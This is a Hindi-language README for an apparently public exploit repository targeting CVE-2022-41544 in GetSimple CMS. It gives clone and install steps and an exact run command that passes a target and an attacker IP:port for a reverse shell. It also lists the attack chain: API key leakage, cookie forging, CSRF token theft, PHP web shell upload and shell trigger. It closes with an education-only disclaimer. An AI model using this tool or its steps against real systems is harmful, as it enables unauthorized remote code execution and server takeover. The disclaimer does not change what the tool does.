
GetSimple CMS में CVE-2022-41544 के लिए Python exploit स्क्रिप्ट। पेनिट्रेशन टेस्टिंग के लिए API key लीकेज, CSRF टोकन निष्कर्षण, PHP शेल अपलोड, और रिवर्स शेल ट्रिगर को स्वचालित करता है।
यह रिपॉजिटरी GetSimple CMS में CVE-2022-41544 भेद्यता का शोषण करने के लिए एक स्क्रिप्ट प्रदान करती है। स्क्रिप्ट भेद्यताओं की जाँच करने, API कुंजियाँ लीक करने, कुकीज़ सेट करने, CSRF टोकन प्राप्त करने, एक शेल अपलोड करने और शेल को ट्रिगर करने के लिए कई चरणों का प्रदर्शन करती है।
telnetlib आयात को हटा दिया गया।रिपॉजिटरी को क्लोन करें:
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
निर्भरताएँ स्थापित करें:
सुनिश्चित करें कि आपके पास Python 3 स्थापित है और requests लाइब्रेरी भी है।
pip3 install requests
स्क्रिप्ट चलाएँ:
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target>: लक्ष्य डोमेन या IP पता।<path>: GetSimple CMS इंस्टॉलेशन का पथ।<ip:port>: रिवर्स शेल के लिए IP और पोर्ट।<username>: GetSimple CMS के लिए व्यवस्थापक उपयोगकर्ता नाम।उदाहरण:
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner(): ASCII कला का उपयोग करके एक स्टाइलाइज़्ड बैनर प्रदर्शित करता है।get_version(target, path): जाँचता है कि क्या GetSimple CMS का लक्ष्य संस्करण भेद्य है।api_leak(target, path): एक प्राधिकरण XML फ़ाइल से API कुंजी पुनर्प्राप्त करने का प्रयास करता है।set_cookies(username, version, apikey): प्राप्त API कुंजी के आधार पर आगे के अनुरोधों के लिए आवश्यक कुकीज़ सेट करता है।get_csrf_token(target, path, headers): शेल अपलोड करने के लिए आवश्यक CSRF टोकन निकालता है।upload_shell(target, path, headers, nonce, shell_content): लक्ष्य सर्वर पर एक PHP शेल अपलोड करता है।shell_trigger(target, path): अपलोड किए गए शेल को ट्रिगर करके एक रिवर्स शेल कनेक्शन स्थापित करता है।main() फ़ंक्शन CVE-2022-41544 भेद्यता का शोषण करने के लिए उपरोक्त फ़ंक्शनों को क्रम में बुलाकर पूरी प्रक्रिया का संचालन करता है।
यह स्क्रिप्ट h3x0v3rl0rd द्वारा विकसित की गई है।
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। सिस्टम तक अनधिकृत पहुँच अवैध और अनैतिक है। इस स्क्रिप्ट का जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर उपयोग करें जिनका परीक्षण करने की आपको स्पष्ट अनुमति है।
यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।